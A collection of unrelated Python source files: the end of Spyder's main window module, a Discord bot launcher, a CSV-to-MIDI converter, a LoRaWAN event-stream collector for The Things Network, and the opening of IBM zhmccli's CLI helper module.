def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path, True), ('/some/other/path, False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while 1: # 1 is faster than True
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
main.py
|
# ==============================================================================
# run this file to run the bot
# ==============================================================================
from commands_help import *
'''
# uncomment if you want to run in cloud
app = Flask('')
@app.route('/')
def home():
return "Hi there hello."
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
'''
@client.event
async def on_ready():
print('\nLayla II is online.\n')
if __name__ == '__main__':
#keep_alive() # uncomment if you want to run in cloud
client.run(Bot.token)
|
convert_long.py
|
import os, csv, threading, subprocess, sys
tempo = 96 * 4
def write_music(music1, length):
return '''0, 0, Header, 1, 2, 480
1, 0, Start_track
1, 0, Title_t, "Test"
1, 0, Time_signature, 3, 3, 96, 8
1, 0, Tempo, 300000
1, 0, End_track
2, 0, Start_track
2, 0, Instrument_name_t, "Church Organ"
2, 0, Program_c, 1, 19
'''+music1+'''2, '''+length+''', End_track
0, 0, End_of_file'''
def write_line(time, note, action):
time_native = time * tempo
note_num = ord(note)
return ("2, "+str(time_native)+", "+action+", 0, "+str(note_num)+", 127")
def get_length(music1):
a = music1[len(music1)-1]
a = a.split(",")[1]
return a
def run(file):
print(file)
with open(file, encoding="utf-8", errors="replace") as f:
reader = csv.reader(f)
music = []
output = []
playing = ""
for row in reader:
music += row
for time, notes in enumerate(music, start=1):
for note in notes:
if note in playing:
continue
else:
output.append(write_line(time, note, "Note_on_c"))
playing += note
for note in playing:
if note not in notes:
playing = playing.replace(note, "")
output.append(write_line(time, note, "Note_off_c"))
with open(""+file+"short", 'w') as myfile:
music_str = ""
for i in output:
music_str += i+"\n"
myfile.write(write_music(music_str, get_length(output)))
name = myfile.name
try:
subprocess.call("csvmidi "+name+" "+name+".mid")
except:
os.system("csvmidi "+name+" "+name+".mid")
def start(files):
for i in files:
t = threading.Thread(target=run, args=(i,))
t.start()
|
TTNv3Collector.py
|
import os
import threading
import json
import pycurl
from datetime import datetime
from time import sleep
import dateutil.parser
import auditing.datacollectors.utils.PhyParser as phy_parser
from auditing.datacollectors.BaseCollector import BaseCollector
from auditing.datacollectors.utils.PacketPersistence import save, save_parsing_error, save_login_error, \
notify_test_event
from auditing.db.TTNRegion import TTNRegion
STREAM_TIMEOUT = 1800 # 30 mins
stream_eu1_url = os.environ['self.STREAM_EU1_URL'] if 'self.STREAM_EU1_URL' in os.environ else 'https://eu1.cloud.thethings.network/api/v3/events'
stream_nam1_url = os.environ['self.STREAM_NAM1_URL'] if 'self.STREAM_NAM1_URL' in os.environ else 'https://nam1.cloud.thethings.network/api/v3/events'
stream_au1_url = os.environ['self.STREAM_AU1_URL'] if 'self.STREAM_AU1_URL' in os.environ else 'https://au1.cloud.thethings.network/api/v3/events'
class TTNv3Collector(BaseCollector):
"""
This collector establishes a connection to a thethingsnetwork.com account and
retrieves data from the https://<region>.cloud.thethings.network/api/v3/events endpoint using Curl.
The steps to retrieve gateway payloads:
1- Connect to the stream event using the values gateway_name and api_key provided by the user.
2- Handle messages with the message() function.
There are different kinds of messages, the most important are:
* gateway downlink and gateway uplink: this is, uplink and downlink data messages
(PHYpayload) as well as radio metadata. Uplinks are received under the name "gs.up.receive" and downlinks under the name "gs.down.send".
* join requests, which are received under the name "gs.up.receive", and join accept, which come under the name "gs.down.send".
* gateway status: it provides the location of the gateway. Come under the name "gs.status.receive".
About the functioning of this collector:
1- It's instantiated in the Orchestrator, and it's started by executing connect()
method.
2- In connect() a thread is launched to start the stream, where new messages are checked every second and processed. The connection is restarted every 30 minutes to avoid the disconnection from the server.
"""
def __init__(self, data_collector_id, organization_id, api_key, gateway_name, region_id, verified):
super().__init__(data_collector_id=data_collector_id,
organization_id=organization_id, verified=verified)
self.api_key = api_key
self.gateway_name = gateway_name
self.region = TTNRegion.find_region_by_id(int(region_id))
self.last_seen = None
self.manually_disconnected = None
self.packet_writter_message = self.init_packet_writter_message()
self.stream_thread = None
self.location = dict() # Dict containing location
self.being_tested = False
def connect(self):
if self.stream_thread is None:
super(TTNv3Collector, self).connect()
self.stream_thread = threading.Thread(
target=self.run_stream, args=())
self.stream_thread.daemon = True
self.stream_thread.start()
else:
self.log.error(
f'Error starting stream thread for gw {self.gateway_name}, another thread is alive')
def on_receive(self, data):
decoded_data = data[:-2].decode() # Each message ends with '\n\n'
# If more than one message was read, we have to split them and
# process each one independently
decoded_data = decoded_data.split('\n\n')
for msg in decoded_data:
self.message(msg)
def run_stream(self):
init_connection = True
headers = [
'Accept: text/event-stream',
'Authorization: Bearer ' + self.api_key
]
post_data = {'identifiers': [
{'gateway_ids': {'gateway_id': self.gateway_name}}
]}
if self.region == 'eu1':
stream_url = stream_eu1_url
elif self.region == 'nam1':
stream_url = stream_nam1_url
elif self.region == 'au1':
stream_url = stream_au1_url
while True:
if init_connection:
curl = pycurl.Curl()
curl.setopt(pycurl.HTTPHEADER, headers)
curl.setopt(pycurl.URL, stream_url)
curl.setopt(pycurl.WRITEFUNCTION, self.on_receive)
curl.setopt(pycurl.POSTFIELDS, json.dumps(post_data))
curl.setopt(pycurl.TIMEOUT, STREAM_TIMEOUT)
multi_curl = pycurl.CurlMulti()
multi_curl.add_handle(curl)
init_connection = False
multi_curl.perform()
status_code = curl.getinfo(pycurl.RESPONSE_CODE)
if status_code == 0:
sleep(1)
elif status_code == 200:
if self.being_tested:
notify_test_event(self.data_collector_id,
'SUCCESS', 'Connection successful')
self.stop_testing = True
self.connected = 'CONNECTED'
self.manually_disconnected = None
while True:
if self.manually_disconnected:
curl.close()
multi_curl.close()
del multi_curl, curl
return
multi_curl.perform()
error = curl.errstr()
if error == '':
pass
elif 'Operation timed out' in error:
# Restart the connection every STREAM_TIMEOUT secs
curl.close()
multi_curl.close()
init_connection = True
break
else:
self.connected = 'DISCONNECTED'
curl.close()
multi_curl.close()
del multi_curl, curl
self.log.error(
f'Error reading data in TTNCollector ID {self.data_collector_id}: {error}')
return
sleep(1)
else:
self.connected = 'DISCONNECTED'
curl.close()
multi_curl.close()
del multi_curl, curl
if self.being_tested:
notify_test_event(self.data_collector_id,
'ERROR', 'Connection failed')
self.stop_testing = True
else:
save_login_error(self.data_collector_id)
return
def disconnect(self):
self.manually_disconnected = True
self.connected = 'DISCONNECTED'
if self.being_tested:
self.log.info(
f'Stopping test connection to DataCollector ID {self.data_collector_id}')
else:
self.log.info(
f'Manually disconnected to gw: {self.gateway_name}')
sleep(2)
if self.stream_thread is None:
self.log.info(
f'Stream thread from gw {self.gateway_name} is already closed')
elif self.stream_thread.is_alive():
self.log.error(
f'Error stopping stream thread for gw {self.gateway_name}: thread is alive')
else:
self.stream_thread = None
super(TTNv3Collector, self).disconnect()
def verify_payload(self, msg):
# If we managed to login into TTN, then we are sure we're receiving TTN messages.
# Then, I comment the code below
return True
# if not self.has_to_parse:
# return True # NOT SURE if this should be True or False
# phyPayload = msg.get('payload', None)
# if not phyPayload:
# self.log.error("Payload not present in message")
# return False
# try:
# phy_parser.setPHYPayload(phyPayload)
# return True
# except Exception as e:
# self.log.error(f'Error parsing physical payload: {e}')
# return False
def message(self, raw_message):
if self.being_tested:
return
try:
message = json.loads(raw_message)['result']
message_data = message.get('data')
name = message.get('name')
if name == 'events.stream.start':
return
elif name == 'gs.up.receive' or name == 'gs.down.send':
self.has_to_parse = True
else:
self.has_to_parse = False
if not self.verified:
# TTN collectors only verify the physical payload, which is only parsed if has_to_parse is True
if not self.verify_message(message):
self.log.debug(
f'Collector is not yet verified ({self.verified_packets} verified), skipping message\n')
return
# Message processing
if name == 'gs.status.receive' and message_data.get('antenna_locations', None):
# Check if the location is given in this message. If so, save it and add it in subsequent messages
try:
self.location['longitude'] = message_data.get(
'antenna_locations')[0].get('longitude')
self.location['latitude'] = message_data.get(
'antenna_locations')[0].get('latitude')
self.location['altitude'] = message_data.get(
'antenna_locations')[0].get('altitude')
except Exception as e:
self.log.error(
f'Error when fetching location in TTNCollector: {str(e)} Message: {raw_message}')
# Save the message that originates the packet
self.packet_writter_message['messages'].append(
{
'topic': None,
'message': raw_message[0:4096],
'data_collector_id': self.data_collector_id
}
)
self.last_seen = datetime.now()
if self.has_to_parse:
packet = phy_parser.setPHYPayload(
message_data.get('raw_payload'))
packet['chan'] = None
packet['stat'] = None
rx_metadata = message_data.get('rx_metadata', None)
if rx_metadata:
packet['lsnr'] = rx_metadata[0].get('snr', None)
packet['rssi'] = rx_metadata[0].get('rssi', None)
else:
packet['lsnr'] = None
packet['rssi'] = None
tmst = message.get('time', None)
if tmst:
packet['tmst'] = datetime.timestamp(
dateutil.parser.parse(tmst))
else:
packet['tmst'] = None
if name == 'gs.up.receive':
settings = message_data.get('settings', None)
if settings:
packet['freq'] = int(settings.get(
'frequency', None))/1000000
packet['codr'] = settings.get('coding_rate', None)
else:
packet['freq'] = None
packet['codr'] = None
else: # name == 'gs.down.send':
request = message_data.get('request', None)
if request:
# rx1_frequency is stored as freq, rx2_frequency isn't stored
packet['freq'] = int(request.get(
'rx1_frequency', None))/1000000
else:
packet['freq'] = None
packet['codr'] = None
packet['rfch'] = None
packet['modu'] = None
packet['datr'] = None
packet['size'] = None
packet['data'] = message_data.get('raw_payload')
if len(self.location) > 0:
packet['latitude'] = self.location['latitude']
packet['longitude'] = self.location['longitude']
packet['altitude'] = self.location['altitude']
# Reset location
self.location = {}
packet['app_name'] = None
packet['dev_name'] = None
identifiers = message.get('identifiers', None)
if identifiers:
packet['gateway'] = identifiers[0]['gateway_ids']['eui']
else:
packet['gateway'] = None
packet['gw_name'] = self.gateway_name
packet['seqn'] = None
packet['opts'] = None
packet['port'] = None
# If dev_eui couldn't be fetched from raw_payload
if packet.get('dev_eui', None) is None:
packet['dev_eui'] = None
packet['date'] = datetime.now().__str__()
packet['data_collector_id'] = self.data_collector_id
packet['organization_id'] = self.organization_id
self.packet_writter_message['packet'] = packet
# Save the packet
save(self.packet_writter_message, self.data_collector_id)
# Reset this variable
self.packet_writter_message = self.init_packet_writter_message()
except Exception as e:
self.log.error(
f'Error creating Packet in TTNCollector ID {self.data_collector_id}: {str(e)} Message: {raw_message}')
save_parsing_error(self.data_collector_id, raw_message)
|
_helper.py
|
# Copyright 2016-2019 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Helper functions.
"""
from __future__ import absolute_import
import json
from collections import OrderedDict
import sys
import threading
import re
import six
import click
import click_spinner
from tabulate import tabulate
import zhmcclient
import zhmcclient_mock
# Importing readline makes interactive mode keep history
# pylint: disable=import-error,unused-import
if sys.platform == 'win32':
# The pyreadline package is supported only on Windows.
import pyreadline as readline # noqa: F401
else:
import readline # noqa: F401
# pylint: enable=import-error,unused-import
# Display of options in usage line
GENERAL_OPTIONS_METAVAR = '[GENERAL-OPTIONS]'
COMMAND_OPTIONS_METAVAR = '[COMMAND-OPTIONS]'
# File path of history file for interactive mode.
# If the file name starts with tilde (which is handled by the shell, not by
# the file system), it is properly expanded.
REPL_HISTORY_FILE = '~/.zhmc_history'
REPL_PROMPT = u'zhmc> ' # Must be Unicode
TABLE_FORMATS = ['table', 'plain', 'simple', 'psql', 'rst', 'mediawiki',
'html', 'latex']
LOG_DESTINATIONS = ['stderr', 'syslog', 'none']
LOG_LEVELS = ['error', 'warning', 'info', 'debug']
LOG_COMPONENTS = ['api', 'hmc', 'console', 'all']
SYSLOG_FACILITIES = ['user', 'local0', 'local1', 'local2', 'local3', 'local4',
'local5', 'local6', 'local7']
# Inner table format for each outer table format, when tables are nested for
# complex property types (arrays, nested objects). If a format is not mapped
# here, the outer table format will be used for the inner table.
# The table formats are the format indicators of the "tabulate" package (not
# the formats supported by zhmccli). In addition, the inner table formats may
# be 'repr' which indicates to use the repr() string on the input data for
# the inner table.
INNER_TABLE_FORMAT = {
'psql': 'plain',
'simple': 'plain',
'rst': 'grid',
'grid': 'grid',
'latex': 'repr',
# TODO on latex: Use latex_raw once "tabulate" can better control escaping
# mediawiki: uses nested mediawiki tables
# html: uses nested html tables
}
# Common Click options for list commands
LIST_OPTIONS = [
click.option('--names-only', is_flag=True, required=False,
help='Restrict properties shown to only the names of the '
'resource and its parents'),
click.option('--uri', is_flag=True, required=False,
help='Add the resource URI to the properties shown'),
click.option('--all', is_flag=True, required=False,
help='Show all properties'),
]
# Click options for email notification (used for storagegroup and storagevolume
# commands)
EMAIL_OPTIONS = [
click.option('--email-to-address', type=str, required=False, multiple=True,
help='An email address for the people that are to be notified '
'via email of any fulfillment actions caused by this '
'command. These email addresses will appear in the "to:" '
'address list in the email that is sent. '
'Can be specified multiple times. '
'Default: No email will be sent'),
click.option('--email-cc-address', type=str, required=False, multiple=True,
help='An email address for the people that are to be notified '
'via email of any fulfillment actions caused by this '
'command. These email addresses will appear in the "cc:" '
'address list in the email that is sent. '
'Can be specified multiple times. '
'Default: The "cc:" address list of the email will be empty'),
click.option('--email-insert', type=str, required=False,
help='Text that is to be inserted in the email notification '
'of any fulfillment actions caused by this command. '
'The text can include HTML formatting tags. '
'Default: The email will have no special text insert'),
]
# Click options use for commands that wait for completion of asynchronous HMC
# oprations
ASYNC_TIMEOUT_OPTIONS = [
click.option('-T', '--operation-timeout', type=int, required=False,
help='Operation timeout in seconds when waiting for '
'completion of asynchronous HMC operations. '
'Default: {def_ot}'.
format(def_ot=zhmcclient.DEFAULT_OPERATION_TIMEOUT)),
]
def abort_if_false(ctx, param, value):
